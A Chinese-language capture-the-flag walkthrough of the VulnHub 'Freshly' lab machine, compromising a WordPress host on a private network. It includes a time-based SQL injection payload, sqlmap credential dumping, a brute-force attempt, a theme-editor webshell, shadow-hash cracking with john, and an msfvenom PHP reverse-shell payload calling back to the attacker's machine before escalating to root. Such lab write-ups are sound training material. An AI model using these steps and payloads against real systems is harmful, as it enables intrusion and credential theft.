VulnHub-Freshly Writeup

目标

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. :)

There are a couple of different ways that you can go with this one. Good luck!

Simply download and import the OVA file into virtualbox!

VulnHub note: You may have issues when importing to VMware. If this is the case. extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.

信息搜集

端口扫描

Quick scan

nmap -T4 -F 192.168.1.104

1
2
3
4
5
6
7
8
Nmap scan report for 192.168.1.104
Host is up (0.00018s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
8080/tcp open http-proxy
MAC Address: 08:00:27:D4:BC:A6 (Oracle VirtualBox virtual NIC)

80端口有一张图片:

在8080端口找到主站:http://192.168.1.104:8080/wordpress/

是wordpress系统

wpscan扫描

针对wordpress进行扫描:

wpscan –url http://192.168.1.104:8080/wordpress/

结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
...
[+] WordPress version 4.1.26 identified (Latest, released on 2019-03-13).
...
[+] WordPress theme in use: twentythirteen
...
| Version: 1.4 (80% confidence)

[i] Plugin(s) Identified:

[+] all-in-one-seo-pack
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
| Last Updated: 2019-02-20T19:20:00.000Z
| [!] The version is out of date, the latest version is 2.12
|
| Detected By: Comment (Passive Detection)
|
| [!] 5 vulnerabilities identified:
|
| [!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
| Fixed in: 2.2.6
| References:
| - https://wpvulndb.com/vulnerabilities/7881
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
| - http://jvn.jp/en/jp/JVN75615300/index.html
| - http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
|
| [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
| Fixed in: 2.2.6.2
| References:
| - https://wpvulndb.com/vulnerabilities/7916
| - https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
|
| [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 2.3.7
| References:
| - https://wpvulndb.com/vulnerabilities/8538
| - http://seclists.org/fulldisclosure/2016/Jul/23
| - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
| - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
| - https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
| - https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
|
| [!] Title: All in One SEO Pack <= 2.3.7 - Unauthenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 2.3.8
| References:
| - https://wpvulndb.com/vulnerabilities/8558
| - https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
| - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
|
| [!] Title: All in One SEO Pack <= 2.9.1.1 - Authenticated Stored Cross-Site Scripting (XSS)
| Fixed in: 2.10
| References:
| - https://wpvulndb.com/vulnerabilities/9159
| - https://www.ripstech.com/php-security-calendar-2018/#day-4
| - https://wordpress.org/support/topic/a-critical-vulnerability-has-been-detected-in-this-plugin/
| - https://semperfiwebdesign.com/all-in-one-seo-pack-release-history/
|
| Version: 2.2.5.1 (60% confidence)
| Detected By: Comment (Passive Detection)
| - http://192.168.1.104:8080/wordpress/, Match: 'All in One SEO Pack 2.2.5.1 by'

[+] cart66-lite
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/
| Last Updated: 2016-01-27T21:11:00.000Z
| [!] The version is out of date, the latest version is 1.5.8
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
| Fixed in: 1.5.4
| References:
| - https://wpvulndb.com/vulnerabilities/7737
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9442
| - https://research.g0blin.co.uk/cve-2014-9442/
|
| [!] Title: Cart66 Lite 1.5.4 - XSS
| Fixed in: 1.5.5
| References:
| - https://wpvulndb.com/vulnerabilities/8014
| - http://packetstormsecurity.com/files/130307/
|
| Version: 1.5.3 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt

[+] contact-form-7
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/
| Last Updated: 2018-12-18T18:05:00.000Z
| [!] The version is out of date, the latest version is 5.1.1
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
| Fixed in: 5.0.4
| References:
| - https://wpvulndb.com/vulnerabilities/9127
| - https://contactform7.com/2018/09/04/contact-form-7-504/
| - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
| - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
| - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
| - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
| - https://www.ripstech.com/php-security-calendar-2018/#day-18
|
| Version: 4.1 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt

[+] proplayer
| Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/
|
| Detected By: Urls In Homepage (Passive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: ProPlayer 4.7.9.1 - SQL Injection
| References:
| - https://wpvulndb.com/vulnerabilities/6912
| - https://www.exploit-db.com/exploits/25605/
|
| Version: 4.7.9.1 (80% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/readme.txt

扫描得到了wordpress版本、插件和存在的漏洞等信息,对以上存在sql注入漏洞的插件进行了测试,但都没有成功

扫描用户名:

1
wpscan --url http://192.168.1.104:8080/wordpress/ --enumerate u

结果:

1
2
3
4
5
6
7
8
[i] User(s) Identified:

[+] admin
| Detected By: Rss Generator (Passive Detection)
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

扫描密码:

1
wpscan --url http://192.168.1.104:8080/wordpress --usernames admin --password-attack wp-login -P word1000.txt

没有得到密码

目录扫描

御剑扫描http://192.168.1.104/发现phpmyadmin,login.php

phpmyadmin无法登陆

渗透

sql注入

对login.php

输入admin’ or sleep(10)# ,页面回显明显停顿
存在注入,使用sqlmap:

sqlmap.py -u “http://192.168.1.104/login.php" –forms

未找到注入点,调高等级:

sqlmap.py -u “http://192.168.1.104/login.php" –forms –level=5 –risk=3

成功发现注入点:

1
2
3
4
5
6
7
8
9
10
11
12
sqlmap identified the following injection point(s) with a total of 6020 HTTP(s) requests:
---
Parameter: user (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: user=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'&password=uUbb&s=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[23:21:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12

依次使用命令:

sqlmap.py -u “http://192.168.1.104/login.php" –forms –dbs

sqlmap.py -u “http://192.168.1.104/login.php" –forms –tables -D “wordpress8080”

sqlmap.py -u “http://192.168.1.104/login.php" –forms –tables -D “wordpress8080”

sqlmap.py -u “http://192.168.1.104/login.php" –forms –columns -T “users” -D “wordpress8080”

sqlmap.py -u “http://192.168.1.104/login.php" –forms –dump -C “username,password” -T “users” -D “wordpress8080”

获得wordpress的账号密码:

1
2
3
4
5
6
7
Table: users
[1 entry]
+----------+---------------------+
| username | password |
+----------+---------------------+
| admin | SuperSecretPassword |
+----------+---------------------+

wordpress后台getshell

登陆wordpress的后台后,外观-编辑模板,随便找一个php文件写入一句话木马,然后菜刀连接:


菜刀上打开虚拟终端:

1
2
[/etc/]$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

当前非root用户
查看/etc/passwd文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

文件中存在提示,估计是要破解密码
下载/etc/passwd和/etc/shadow,在kali中:

unshadow passwd shadow > hashes.txt

将SuperSecretPassword也写入/usr/share/john/password.lst中,然后:

john hashes.txt


发现root用户密码就是SuperSecretPassword

提权

msf中生成反弹meterpreter:

1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=5555 -f raw > frenshly.php

菜刀上传frenshly.php至目标,然后配置msf监听,收到反弹meterpreter后,输入shell命令进入shell控制台,输入”su - root”后提示必须在终端运行,于是输入python -c ‘import pty;pty.spawn(“/bin/bash”)’进入终端完成提权.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > sysinfo
Computer : Freshly
OS : Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686
Meterpreter : php/linux
meterpreter > getuid
Server username: daemon (1)
meterpreter > shell
Process 1384 created.
Channel 0 created.
su - root
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
tythirteen$ ^[[C^[[C^[[C^[[C^[[C1-0/apps/wordpress/htdocs/wp-content/themes/twent

tythirteen$ su - root
su - root
Password: SuperSecretPassword

root@Freshly:~# id
id
uid=0(root) gid=0(root) groups=0(root)

总结

  • 信息收集十分重要,必须充分掌握目标的端口、目录等
  • 提高sqlmap的level、risk参数能是测试更加完整
  • 掌握kali下工具的使用:wpscan、john